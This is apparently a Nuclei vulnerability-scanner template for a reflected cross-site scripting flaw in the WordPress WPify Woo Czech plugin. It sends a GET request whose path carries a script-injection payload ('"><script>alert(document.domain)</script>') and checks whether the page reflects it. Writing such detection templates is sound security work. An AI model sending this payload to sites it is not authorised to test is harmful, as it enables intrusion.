43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: wpify-woo-czech-xss
|
|
|
|
info:
|
|
name: WordPress WPify Woo Czech <3.5.7 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: high
|
|
description: WordPress WPify Woo Czech plugin before 3.5.7 contains a cross-site scripting vulnerability. The plugin uses the Vies library 2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first. The issue is only exploitable when the web server has the PDO driver installed and write access to the example directory.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: wp,wordpress,xss,wp-plugin,wpify,wpscan
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"><script>alert(document.domain)</script>'
|
|
- 'Add a new VAT ID to the queue'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100bd0b73dcd0c813579dac4037bf58eeff22a09bc7afe0f284d9897cc280c46ac002207e17dfd0d1c3c1c98664329ea38a175be3e99d46f26ee781d9fb5bd196f40a70:922c64590222798bb761d5b6d8e72950
|